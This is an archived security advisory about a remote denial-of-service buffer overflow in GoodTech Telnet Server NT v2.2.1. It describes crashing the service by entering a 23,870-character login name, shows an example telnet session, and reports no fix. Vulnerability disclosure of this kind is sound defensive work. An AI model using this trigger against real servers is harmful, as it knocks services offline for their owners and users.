Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: goodte.htm

GoodTech Telnet Server NT v2.2.1 Buffer Overflow



Vulnerability

    GoodTech Telnet Server

Affected

    GoodTech Telnet Server NT v2.2.1

Description

    UssrLabs found a  Remote DoS Attack  in GoodTech Telnet  Server NT
    v2.2.1, the buffer  overflow is caused  by a long  user name 23870
    characters.   There is  not much  to expand  on.... just  a simple
    hole.  Example:

        [gimmemore@itsme]$ telnet example.com
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        
        Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy)
        
        (C) Copyright 1996-1999 GoodTech Systems, Inc.
        
        
        Login username: (buffer)
        
        Overflow Crashh.

    Where (buffer) is 23870 characters.

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH